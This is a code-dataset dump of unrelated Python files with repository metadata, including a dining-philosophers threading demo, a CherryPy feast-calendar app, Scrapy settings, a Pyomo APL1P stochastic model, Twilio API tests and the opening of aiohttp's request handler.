self.lock = threading.Condition(threading.Lock())
self.taken = False
def take(self, user): # synchronized
with self.lock:
while self.taken == True:
self.lock.wait()
self.user = user
self.taken = True
sys.stdout.write("Philosopher[%s] picks up fork[%s]\n" % (user, self.number))
self.lock.notifyAll()
def drop(self, user): # synchronized
with self.lock:
while self.taken == False:
self.lock.wait()
self.user = -1
self.taken = False
sys.stdout.write("Philosopher[%s] puts down fork[%s]\n" % (user, self.number))
self.lock.notifyAll()
class Philosopher (threading.Thread):
def __init__(self, number, left, right, butler):
threading.Thread.__init__(self)
self.number = number # philosopher id
self.left = left
self.right = right
self.butler = butler
def run(self):
for i in range(1):
self.butler.down() # butler starts serving (philosopher takes a seat)
time.sleep(0.1) # think
self.left.take(self.number) # pick up the left fork
time.sleep(0.1) # (yield makes deadlock more likely)
self.right.take(self.number) # pick up the right fork
time.sleep(0.1) # eat
self.right.drop(self.number) # put down the right fork
self.left.drop(self.number) # put down the left fork
self.butler.up() # butler stops serving (philosopher leaves the table)
sys.stdout.write("Philosopher[%s] finished thinking and starts eating\n" % self.number)
def main():
# number of philosophers (and of forks)
n = 5
# avoid deadlock (at most n-1 philosophers may be seated at once)
butler = Semaphore(n-1)
# forks
c = [Fork(i) for i in range(n)]
# philosophers
p = [Philosopher(i, c[i], c[(i+1)%n], butler) for i in range(n)]
for i in range(n):
p[i].start()
if __name__ == "__main__":
main()
|
[
"brownfoxsir@gmail.com"
] |
brownfoxsir@gmail.com
|
a7619f6654ac154392697fbcb15790412af0f201
|
dda7e790b230c9f2e42993fc35706e228aca45f8
|
/Projet_info.py
|
b7c34f5d9c007ac723fdca53fe2e0018c05fed38
|
[] |
no_license
|
ablo340/Pyhton_website
|
a266c80ad9327cad39746f97e840a40ca56487ff
|
99dd2190342877e190113f7049500f73a2beb0fb
|
refs/heads/master
| 2022-04-09T15:28:18.707254
| 2020-03-16T20:14:05
| 2020-03-16T20:14:05
| 124,147,538
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,548
|
py
|
import json
import os
import cherrypy
from cherrypy.lib.static import serve_file
import jinja2
import jinja2plugin
import jinja2tool
class WebApp():
def __init__(self):
self.feasts= self.loadfeasts()
# route to the home page
@cherrypy.expose
def index(self):
if len(self.feasts) == 0:
feasts = '<p>Base de donnée vide.</p>'
else:
feasts = '<table id="feasts">'
for i in range(len(self.feasts)):
liste = self.feasts[i]
feasts += '''<tr>
<th>
<a href="loadinfos?i={}">{}</a>
</th>
</tr>'''.format(i, liste['feast'])
feasts += '</table>'
return {'feasts': feasts}
# route to the add-date form
@cherrypy.expose
def add(self):
return serve_file(os.path.join(ROOT, 'templates/add.html'))
# load the feasts from the JSON database
def loadfeasts(self):
try:
with open('Bdd.json', 'r', encoding="utf-8") as file:
content = json.loads(file.read())
return content['feasts']
except:
cherrypy.log('Loading database failed.')
return []
# route to a feast's details
@cherrypy.expose
def loadinfos(self,i):
liste= self.feasts[int(i)]
return {'feast': liste['feast'], 'date': liste['date'], 'tradition': liste['tradition'], 'origins': liste['origins']}
# route to add an event to the database
@cherrypy.expose
def addevent(self, feast, date, tradition,origins):
if feast != '' and date != '':
self.feasts.append({
'feast': feast,
'date': date,
'tradition': tradition,
'origins': origins
})
self.savevent()
raise cherrypy.HTTPRedirect('/')
# save additions to the database
def savevent(self):
try:
with open('Bdd.json', 'w', encoding="utf-8") as file:
file.write(json.dumps({
'feasts': self.feasts
}, ensure_ascii=False))
except:
cherrypy.log('Saving database failed.')
@cherrypy.expose
def getfeasts(self):
return json.dumps({
'feasts': self.feasts
}, ensure_ascii=False).encode('utf-8')
# route to delete a feast via kivy
@cherrypy.expose
def deletefeast(self, i):
result = 'KO'
i = int(i)
if 0 <= i < len(self.feasts):
del(self.feasts[i])
result = 'OK'
return result.encode('utf-8')
# route to add a feast via kivy
@cherrypy.expose
def addfeast(self,feast,date,tradition,origin):
self.feasts.append(
{
'tradition':str(tradition),
'feast':str(feast),
'origins':str(origin),
'date':str(date)
}
)
self.savevent()
if __name__ == '__main__':
# Register Jinja2 plugin and tool
ENV = jinja2.Environment(loader=jinja2.FileSystemLoader('.'))
jinja2plugin.Jinja2TemplatePlugin(cherrypy.engine, env=ENV).subscribe()
cherrypy.tools.template = jinja2tool.Jinja2Tool()
ROOT = os.path.abspath(os.getcwd())
cherrypy.quickstart(WebApp(), '', 'Projet_info.conf')
|
[
"ablo110@live.fr"
] |
ablo110@live.fr
|
2949108488c1b01a6e1884163add585d51810555
|
837fff65705faf7419e15e2f3a7563601c81950d
|
/quotes/quotes/settings.py
|
9ef0c8af0d817aeb4a14e6903a93cc71a8b8de01
|
[] |
no_license
|
abdulazeem/Scrapy-Projects
|
1c7b7ee85cc3026510a01e6f6fe5aa162935694f
|
3d3a217bd246cd72cc3c0b10c1073f1664f9141a
|
refs/heads/master
| 2022-12-03T07:58:41.478320
| 2020-08-24T12:55:58
| 2020-08-24T12:55:58
| 289,927,738
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,103
|
py
|
# -*- coding: utf-8 -*-
# Scrapy settings for quotes project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# https://doc.scrapy.org/en/latest/topics/settings.html
# https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
# https://doc.scrapy.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'quotes'
SPIDER_MODULES = ['quotes.spiders']
NEWSPIDER_MODULE = 'quotes.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'quotes (+http://www.yourdomain.com)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See https://doc.scrapy.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'quotes.middlewares.QuotesSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'quotes.middlewares.QuotesDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See https://doc.scrapy.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See https://doc.scrapy.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'quotes.pipelines.QuotesPipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
FEED_EXPORT_ENCODING = 'utf-8'
|
[
"azeem012001@gmail.com"
] |
azeem012001@gmail.com
|
51d14d9e353798e5fc1aee069bf86c642f2df85d
|
4b8ac4077e7480817a8ef6be6a5831ee4bdd2b9e
|
/uchu-cli/utils.py
|
203ebd1ecc804a3445fd24218874208472ff6c2d
|
[
"MIT"
] |
permissive
|
UchuServer/cli
|
14c8dfd91d17746d60cd8c08a0865b63e51ad8bf
|
ebe1dbeda4a1035744c32df229e968d4568a6927
|
refs/heads/master
| 2023-06-17T19:04:25.623924
| 2021-07-13T10:16:19
| 2021-07-13T10:16:19
| 321,522,414
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,243
|
py
|
import requests
from . import commands
def WorkOutLargestCommand() -> int:
Largest: int = 0
for x in commands.CommandList:
if (len(x) + len(GetArgs(x)) + 1) > Largest:
Largest = (len(x) + len(GetArgs(x)) + 1)
return Largest
def GetArgs(Command: str) -> str:
Return: str = ""
if commands.ArgsList[Command][0] == "": return Return
for x in commands.ArgsList[Command]:
Return += "[" + x + "] "
return Return
def Help() -> None:
print("Uchu CLI: ", end="\n\n")
print("\tuchu-cli [IP] [Port] [Subcommand]", end="\n\n")
print("Subcommands: ", end="\n\n")
i: int = 0
Largest: int = WorkOutLargestCommand()
for x in commands.CommandList:
print("\t" + x, end="") # Print Commands
print(" " + GetArgs(x), end="") # Print Args
print(" "*(Largest-(len(x) + 1 + len(GetArgs(x)))), end="") # Print Gap
print(" - " + commands.HelpList[x]) # Print Help List
print("")
exit()
def CheckNetworkConnection(IP: str, Port: int) -> None:
try:
r = requests.get("http://" + IP + ":" + str(Port) + "/")
if r.status_code != 200:
exit()
except:
print("Couldn't connect to master server")
exit()
|
[
"17jbradford@tqacademy.co.uk"
] |
17jbradford@tqacademy.co.uk
|
cf94fdc877f7461b30060f45ddcd56cac0cb6e01
|
6c721f3cfce6dc88396cd3b5f6a59d65a2ea5033
|
/some_learn/Data_Set_handle/Caltech-Dateset/anaylsis_result/draw_result_in_new_anno/src/generate_result2txt.py
|
f9ecc3049084e101fc53fc0cad1d2e16c74bdc91
|
[
"MIT"
] |
permissive
|
unicoe/PycharmProjects
|
20a3dabe88c7874da54451c7bb16999afc0eee35
|
23ff314eb5ac9bfa01a8278089d722b5d0061751
|
refs/heads/master
| 2020-03-23T09:16:25.907188
| 2019-12-21T03:10:49
| 2019-12-21T03:10:49
| 141,377,686
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,733
|
py
|
def generate_result(resource_path, des_path):
"""
Split a detection result file into per-key name/score/bbox text files.
:param resource_path: detection results, one line per box: "<key> <score> <x1> <y1> <x2> <y2>"
:param des_path: output file for the grouping keys (scores go to out1.txt, boxes as "x,y,w,h" to out2.txt)
:return: None
"""
des_path1 = "/home/user/PycharmProjects/caltech_new_anno/out/out1.txt"
des_path2 = "/home/user/PycharmProjects/caltech_new_anno/out/out2.txt"
rf = open(resource_path)
content = rf.readline()
cnt = 0
tmp_dict = {}
while content:
#print content
res = content.replace("\n", "").split(" ")
cls = str(res[0:1][0])
bbox = res[1:6]
if cls in tmp_dict:
tmp_dict[cls].append(bbox)
else:
tmp_dict[cls] = [bbox]
cnt += 1
content = rf.readline()
rf.close()
wpath = resource_path.split("/")[-1]
respath = wpath[-9:-4] + "/" + wpath[-4:]
print(wpath, respath)
wfname = open(des_path, "w")
wfscr = open(des_path1, "w")
wfbbox = open(des_path2, "w")
for key_ in tmp_dict:
wfname.write(str(key_)+',')
for detail in tmp_dict[key_]:
for index in detail:
if index == detail[0]:
wfscr.write(str(index))
else:
if index is detail[1]:
tmpp1 = index
wfbbox.write(str(int(float(index))))
if index is detail[2]:
tmpp2 = index
wfbbox.write(str(int(float(index))))
if index is detail[3]:
wfbbox.write(str(int(float(index) - float(tmpp1))))
if index is detail[4]:
wfbbox.write(str(int(float(index) - float(tmpp2))))
if index is not detail[-1]:
wfbbox.write(",")
if len(tmp_dict[key_]) > 1:
if detail is not tmp_dict[key_][-1]:
wfscr.write(";")
wfbbox.write(";")
wfname.write("\n")
wfscr.write("\n")
wfbbox.write("\n")
wfname.close()
wfscr.close()
wfbbox.close()
generate_result("/home/user/PycharmProjects/caltech_new_anno/3_15_faster1_det_test_person.txt", "/home/user/PycharmProjects/caltech_new_anno/out/out.txt")
# def generate_all_result(path):
# import os
# dirList = []
# fileList = []
#
# files = os.listdir(path)
#
# for f in files:
# if(os.path.isdir(path + "/" + f)):
# if f[0] != '.':
# dirList.append(f)
# if(os.path.isfile(path + '/'+ f)):
# fileList.append(f)
#
# for fl in fileList:
# generate_result(path + fl, "/home/user/PycharmProjects/MissRate_FPPI_plot/out.txt")
#generate_all_result("/home/user/Downloads/caltech_data_set/data_test/")
|
[
"unicoe@163.com"
] |
unicoe@163.com
|
617f2daa7d6f16a5c0dcba89f71b914b51a6c829
|
f1d67722dcd4c2209eedc0a61e5ea0ee27c95470
|
/mpisppy/tests/examples/apl1p.py
|
24988a8f7c43d751af19ab6376eb825d98a0bc64
|
[] |
no_license
|
wangcj05/mpi-sppy
|
08204019b466da5e0812b16dd5cb53da1bdbd793
|
42aff4c11dc42fcba8a9520da00e48c6e9ab7d85
|
refs/heads/main
| 2023-08-25T04:36:58.606490
| 2021-11-01T21:40:14
| 2021-11-01T21:40:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,295
|
py
|
#ReferenceModel for full set of scenarios for APL1P; May 2021
#We use costs from Bailey, Jensen and Morton, Response Surface Analysis of Two-Stage Stochastic Linear Programming with Recourse
#(costs are 10x higher than in the original [Infanger 1992] paper)
import pyomo.environ as pyo
import numpy as np
import mpisppy.scenario_tree as scenario_tree
import mpisppy.utils.sputils as sputils
import mpisppy.utils.amalgomator as amalgomator
# Use this random stream:
apl1pstream = np.random.RandomState()
def APL1P_model_creator(seed):
apl1pstream.seed(seed)
random_array = apl1pstream.rand(6) #We only use 5 random numbers
#
# Model
#
model = pyo.ConcreteModel()
#
# Parameters
#
# generator
model.G = [1,2]
# Demand level
model.DL = [1,2,3]
# Availability
avail_outcome = ([1.,0.9,0.5,0.1],[1.,0.9,0.7,0.1,0.0])
avail_probability = ([0.2,0.3,0.4,0.1],[0.1,0.2,0.5,0.1,0.1])
avail_cumprob = (np.cumsum(avail_probability[0]),np.cumsum(avail_probability[1]))
assert(max(avail_cumprob[0])==1.0 and max(avail_cumprob[1])==1.0)
def availability_init(m,g):
rd = random_array[g]
i = np.searchsorted(avail_cumprob[g-1],rd)
return avail_outcome[g-1][i]
model.Availability = pyo.Param(model.G, within=pyo.NonNegativeReals,
initialize=availability_init)
# Min Capacity
cmin_init = 1000
model.Cmin = pyo.Param(model.G, within=pyo.NonNegativeReals, initialize=cmin_init)
# Investment, aka Capacity costs
invest = np.array([4.,2.5])
def investment_init(m,g):
return(invest[g-1])
model.Investment = pyo.Param(model.G, within=pyo.NonNegativeReals,
initialize=investment_init)
# Operating Cost
op_cost = np.array([[4.3,2.0,0.5],[8.7,4.0,1.0]])
def operatingcost_init(m,g,dl):
return(op_cost[g-1,dl-1])
model.OperatingCost = pyo.Param(model.G, model.DL, within=pyo.NonNegativeReals,
initialize = operatingcost_init)
# Demand
demand_outcome = [900,1000,1100,1200]
demand_prob = [.15,.45,.25,.15]
demand_cumprob = np.cumsum(demand_prob)
assert(max(demand_cumprob) == 1.0)
def demand_init(m,dl):
rd = random_array[2+dl]
i = np.searchsorted(demand_cumprob,rd)
return demand_outcome[i]
model.Demand = pyo.Param(model.DL, within=pyo.NonNegativeReals,
initialize=demand_init)
# Cost of unserved demand
unserved_cost =10.0
model.CostUnservedDemand = pyo.Param(model.DL, within=pyo.NonNegativeReals,
initialize=unserved_cost)
#
# Variables
#
# Capacity of generators
model.CapacityGenerators = pyo.Var(model.G, domain=pyo.NonNegativeReals)
# Operation level
model.OperationLevel = pyo.Var(model.G, model.DL, domain=pyo.NonNegativeReals)
# Unserved demand
model.UnservedDemand = pyo.Var(model.DL, domain=pyo.NonNegativeReals)
#
# Constraints
#
# Minimum capacity
def MinimumCapacity_rule(model, g):
return model.CapacityGenerators[g] >= model.Cmin[g]
model.MinimumCapacity = pyo.Constraint(model.G, rule=MinimumCapacity_rule)
# Maximum operating level
def MaximumOperating_rule(model, g):
return sum(model.OperationLevel[g, dl] for dl in model.DL) <= model.Availability[g] * model.CapacityGenerators[g]
model.MaximumOperating = pyo.Constraint(model.G, rule=MaximumOperating_rule)
# Satisfy demand
def SatisfyDemand_rule(model, dl):
return sum(model.OperationLevel[g, dl] for g in model.G) + model.UnservedDemand[dl] >= model.Demand[dl]
model.SatisfyDemand = pyo.Constraint(model.DL, rule=SatisfyDemand_rule)
#
# Stage-specific cost computations
#
def ComputeFirstStageCost_rule(model):
return sum(model.Investment[g] * model.CapacityGenerators[g] for g in model.G)
model.FirstStageCost = pyo.Expression(rule=ComputeFirstStageCost_rule)
def ComputeSecondStageCost_rule(model):
expr = sum(
model.OperatingCost[g, dl] * model.OperationLevel[g, dl] for g in model.G for dl in model.DL) + sum(
model.CostUnservedDemand[dl] * model.UnservedDemand[dl] for dl in model.DL)
return expr
model.SecondStageCost = pyo.Expression(rule=ComputeSecondStageCost_rule)
def total_cost_rule(model):
return model.FirstStageCost + model.SecondStageCost
model.Total_Cost_Objective = pyo.Objective(rule=total_cost_rule, sense=pyo.minimize)
return(model)
def scenario_creator(sname, num_scens=None):
scennum = sputils.extract_num(sname)
model = APL1P_model_creator(scennum)
# Create the list of nodes associated with the scenario (for two stage,
# there is only one node associated with the scenario--leaf nodes are
# ignored).
model._mpisppy_node_list = [
scenario_tree.ScenarioNode(
name="ROOT",
cond_prob=1.0,
stage=1,
cost_expression=model.Total_Cost_Objective,
scen_name_list=None, # Deprecated?
nonant_list=[model.CapacityGenerators],
scen_model=model,
)
]
#Add the probability of the scenario
if num_scens is not None :
model._mpisppy_probability = 1/num_scens
return(model)
#=========
def scenario_names_creator(num_scens,start=None):
# (only for Amalgomator): return the full list of num_scens scenario names
# if start!=None, the list starts with the 'start' labeled scenario
if (start is None) :
start=0
return [f"scen{i}" for i in range(start,start+num_scens)]
#=========
def inparser_adder(inparser):
# (only for Amalgomator): add command options unique to apl1p
pass
#=========
def kw_creator(options):
# (only for Amalgomator): linked to the scenario_creator and inparser_adder
kwargs = {"num_scens" : options['num_scens'] if 'num_scens' in options else None,
}
return kwargs
#============================
def scenario_denouement(rank, scenario_name, scenario):
pass
#============================
def xhat_generator_apl1p(scenario_names, solvername="gurobi", solver_options=None):
'''
For sequential sampling.
Takes scenario names as input and provide the best solution for the
approximate problem associated with the scenarios.
Parameters
----------
scenario_names: int
Names of the scenario we use
solvername: str, optional
Name of the solver used. The default is "gurobi"
solver_options: dict, optional
Solving options. The default is None.
Returns
-------
xhat: str
A generated xhat, solution to the approximate problem induced by scenario_names.
'''
num_scens = len(scenario_names)
ama_options = { "EF-2stage": True,
"EF_solver_name": solvername,
"EF_solver_options": solver_options,
"num_scens": num_scens,
"_mpisppy_probability": 1/num_scens,
}
#We use from_module to build easily an Amalgomator object
ama = amalgomator.from_module("mpisppy.tests.examples.apl1p",
ama_options,use_command_line=False)
#Correcting the building by putting the right scenarios.
ama.scenario_names = scenario_names
ama.run()
# get the xhat
xhat = sputils.nonant_cache_from_ef(ama.ef)
return xhat
if __name__ == "__main__":
#An example of sequential sampling for the APL1P model
from mpisppy.confidence_intervals.seqsampling import SeqSampling
optionsFSP = {'eps': 5.0,
'solvername': "gurobi_direct",
"c0":50,}
apl1p_pb = SeqSampling("mpisppy.tests.examples.apl1p",
xhat_generator_apl1p,
optionsFSP,
stopping_criterion="BPL",
stochastic_sampling=False)
res = apl1p_pb.run()
print(res)
|
[
"sylvain.czx@gmail.com"
] |
sylvain.czx@gmail.com
|
3fe76d3f252cdb4ef3b8aa1b2bd57309ffc10491
|
50888c8f98b0f86f60c5aba2f5bb2e127033f78f
|
/apps/utils/redis_obj.py
|
aa88f7bbf2f428ab499697fd67d6faa17755e9ff
|
[] |
no_license
|
nhb-git/mxOnline
|
83b2325812cfc599f0921c989b6bd687a8f37ed2
|
7d5d7c2361f9a38ed0e1c88344bb2f5125f0fbb9
|
refs/heads/master
| 2022-12-05T23:15:26.273598
| 2020-09-03T00:11:11
| 2020-09-03T00:11:11
| 287,920,982
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 356
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: Davis Niu
# Created: 8/16/2020 1:37 AM
# File: redis_obj.py
import redis
from MxOnline.settings import REDIS_HOST, REDIS_PORT
def redis_obj(host=REDIS_HOST, port=REDIS_PORT):
r = redis.Redis(host, port, db=0, charset='utf8', decode_responses=True)
return r
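# Example usage sketch (assumes a Redis server is reachable at REDIS_HOST:REDIS_PORT):
# r = redis_obj()
# r.set('greeting', 'hello')
# print(r.get('greeting'))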
|
[
"niuhaibao@gmail.com"
] |
niuhaibao@gmail.com
|
8ce07f08c2d9e49656282ac45274bda28b6f7c7b
|
1dab646570a8ac9af92b15031883f874307a0ca9
|
/111.py
|
825a9181a8da58753c1b9661724e20767b48793e
|
[] |
no_license
|
reshmapalani/pythonprogram
|
8854bd5da4bc5f7b523a07f9c0be7b1ec5b8ae22
|
88b203168a412d42dd4ebfde3453a216a3a4c26a
|
refs/heads/master
| 2020-04-27T16:58:49.845751
| 2019-05-15T18:30:59
| 2019-05-15T18:30:59
| 174,499,664
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 160
|
py
|
import random
d = {8:37,38:9,11:2,13:34,40:68,65:46,52:81}
p = random.choice([2,8,9,13,40,65,52])
print("You got",p)
if p in d:
print("You can go to ",d[p])
|
[
"noreply@github.com"
] |
reshmapalani.noreply@github.com
|
cd88987a7e86a3cba2b431e4cd63332219704a57
|
951de9221b0b3cfc20ad0ad45ec751be614a8709
|
/tests/integration/messaging/v1/test_brand_registration.py
|
6e6be298a71a6cf42b880de0a98e916ed3c44d85
|
[
"MIT"
] |
permissive
|
HireAnEsquire/twilio-python
|
6762e2467504e25290e7fb604d851d586dde18a4
|
48e970fa0b4b46be5ee560a1de5976ca3ad69fef
|
refs/heads/main
| 2023-06-30T08:25:01.735944
| 2021-08-03T20:24:14
| 2021-08-03T20:24:14
| 391,991,328
| 0
| 0
|
MIT
| 2021-08-02T14:58:54
| 2021-08-02T14:58:53
| null |
UTF-8
|
Python
| false
| false
| 5,456
|
py
|
# coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from tests import IntegrationTestCase
from tests.holodeck import Request
from twilio.base.exceptions import TwilioException
from twilio.http.response import Response
class BrandRegistrationTestCase(IntegrationTestCase):
def test_fetch_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.messaging.v1.brand_registrations("BNXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()
self.holodeck.assert_has_request(Request(
'get',
'https://messaging.twilio.com/v1/a2p/BrandRegistrations/BNXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))
def test_fetch_response(self):
self.holodeck.mock(Response(
200,
'''
{
"sid": "BN0044409f7e067e279523808d267e2d85",
"account_sid": "AC78e8e67fc0246521490fb9907fd0c165",
"customer_profile_bundle_sid": "BU3344409f7e067e279523808d267e2d85",
"a2p_profile_bundle_sid": "BU3344409f7e067e279523808d267e2d85",
"date_created": "2021-01-27T14:18:35Z",
"date_updated": "2021-01-27T14:18:36Z",
"status": "PENDING",
"tcr_id": "BXXXXXX",
"failure_reason": "Registration error",
"url": "https://messaging.twilio.com/v1/a2p/BrandRegistrations/BN0044409f7e067e279523808d267e2d85",
"brand_score": 42
}
'''
))
actual = self.client.messaging.v1.brand_registrations("BNXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()
self.assertIsNotNone(actual)
def test_list_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.messaging.v1.brand_registrations.list()
self.holodeck.assert_has_request(Request(
'get',
'https://messaging.twilio.com/v1/a2p/BrandRegistrations',
))
def test_read_response(self):
self.holodeck.mock(Response(
200,
'''
{
"meta": {
"page": 0,
"page_size": 50,
"first_page_url": "https://messaging.twilio.com/v1/a2p/BrandRegistrations?PageSize=50&Page=0",
"previous_page_url": null,
"next_page_url": null,
"key": "data",
"url": "https://messaging.twilio.com/v1/a2p/BrandRegistrations?PageSize=50&Page=0"
},
"data": [
{
"sid": "BN0044409f7e067e279523808d267e2d85",
"account_sid": "AC78e8e67fc0246521490fb9907fd0c165",
"customer_profile_bundle_sid": "BU3344409f7e067e279523808d267e2d85",
"a2p_profile_bundle_sid": "BU3344409f7e067e279523808d267e2d85",
"date_created": "2021-01-27T14:18:35Z",
"date_updated": "2021-01-27T14:18:36Z",
"status": "APPROVED",
"tcr_id": "BXXXXXX",
"failure_reason": "Registration error",
"url": "https://messaging.twilio.com/v1/a2p/BrandRegistrations/BN0044409f7e067e279523808d267e2d85",
"brand_score": 42
}
]
}
'''
))
actual = self.client.messaging.v1.brand_registrations.list()
self.assertIsNotNone(actual)
def test_create_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.messaging.v1.brand_registrations.create(customer_profile_bundle_sid="BUXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX", a2p_profile_bundle_sid="BUXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX")
values = {
'CustomerProfileBundleSid': "BUXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
'A2PProfileBundleSid': "BUXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
}
self.holodeck.assert_has_request(Request(
'post',
'https://messaging.twilio.com/v1/a2p/BrandRegistrations',
data=values,
))
def test_create_response(self):
self.holodeck.mock(Response(
201,
'''
{
"sid": "BN0044409f7e067e279523808d267e2d85",
"account_sid": "AC78e8e67fc0246521490fb9907fd0c165",
"customer_profile_bundle_sid": "BU0000009f7e067e279523808d267e2d90",
"a2p_profile_bundle_sid": "BU1111109f7e067e279523808d267e2d85",
"date_created": "2021-01-28T10:45:51Z",
"date_updated": "2021-01-28T10:45:51Z",
"status": "PENDING",
"tcr_id": "BXXXXXX",
"failure_reason": "Registration error",
"url": "https://messaging.twilio.com/v1/a2p/BrandRegistrations/BN0044409f7e067e279523808d267e2d85",
"brand_score": 42
}
'''
))
actual = self.client.messaging.v1.brand_registrations.create(customer_profile_bundle_sid="BUXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX", a2p_profile_bundle_sid="BUXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX")
self.assertIsNotNone(actual)
|
[
"team_interfaces+github@twilio.com"
] |
team_interfaces+github@twilio.com
|
18110511b08e58d3d47e69557d3cd22b3cb3d6ff
|
9842fd63e3476dc58e0b2fc09e3c9f573c1fe054
|
/lwc/middleware.py
|
b9eedeff4c3167b07f9d2da071f03e171e604062
|
[] |
no_license
|
pythonista6785/Launching-With-Code-lwc-
|
e8e6c1812bbbea10e5e2e27858fae90fd68683b5
|
b454fe352b546ce522ef9ab1aa92b4fdbe600e52
|
refs/heads/master
| 2021-04-28T23:44:03.779846
| 2017-01-06T10:50:41
| 2017-01-06T10:50:41
| 77,728,314
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 274
|
py
|
from joins.models import Join
class ReferMiddleware():
def process_request(self, request):
ref_id = request.GET.get("ref")
#print ref_id
try:
obj = Join.objects.get(ref_id = ref_id)
except:
obj = None
if obj:
request.session["join_id_ref"] = obj.id
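# Usage note: this is an old-style middleware hook; to activate it, add this class's
# dotted path (e.g. 'lwc.middleware.ReferMiddleware' -- path assumed from this file's
# location) to MIDDLEWARE_CLASSES in settings.py.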
|
[
"pythonista.hlp@gmail.com"
] |
pythonista.hlp@gmail.com
|
d63468cc5addf7f2c479859b8f107f50a4eb9d1c
|
d5e16a3880ad978eafef136ebf554297e5c9a30f
|
/elan2mqtt/aiohttp/web_protocol.py
|
ad0c0498e39562e30f1f8275a719b554a813b06c
|
[
"MIT"
] |
permissive
|
zdar/elan2mqtt
|
42333ec7e8bb53f5946f0916fc4a39ba05294e24
|
c8a21ea3e1dc80a360aed2d7eadf74ee5a3efcd4
|
refs/heads/master
| 2023-02-04T23:57:16.480168
| 2023-01-20T09:49:31
| 2023-01-20T09:49:31
| 156,423,532
| 11
| 5
|
MIT
| 2022-01-28T08:56:10
| 2018-11-06T17:44:01
|
Python
|
UTF-8
|
Python
| false
| false
| 22,548
|
py
|
import asyncio
import asyncio.streams
import traceback
import warnings
from collections import deque
from contextlib import suppress
from html import escape as html_escape
from http import HTTPStatus
from logging import Logger
from typing import (
TYPE_CHECKING,
Any,
Awaitable,
Callable,
Deque,
Optional,
Sequence,
Tuple,
Type,
Union,
cast,
)
import attr
import yarl
from .abc import AbstractAccessLogger, AbstractStreamWriter
from .base_protocol import BaseProtocol
from .helpers import ceil_timeout
from .http import (
HttpProcessingError,
HttpRequestParser,
HttpVersion10,
RawRequestMessage,
StreamWriter,
)
from .log import access_logger, server_logger
from .streams import EMPTY_PAYLOAD, StreamReader
from .tcp_helpers import tcp_keepalive
from .web_exceptions import HTTPException
from .web_log import AccessLogger
from .web_request import BaseRequest
from .web_response import Response, StreamResponse
__all__ = ("RequestHandler", "RequestPayloadError", "PayloadAccessError")
if TYPE_CHECKING: # pragma: no cover
from .web_server import Server
_RequestFactory = Callable[
[
RawRequestMessage,
StreamReader,
"RequestHandler",
AbstractStreamWriter,
"asyncio.Task[None]",
],
BaseRequest,
]
_RequestHandler = Callable[[BaseRequest], Awaitable[StreamResponse]]
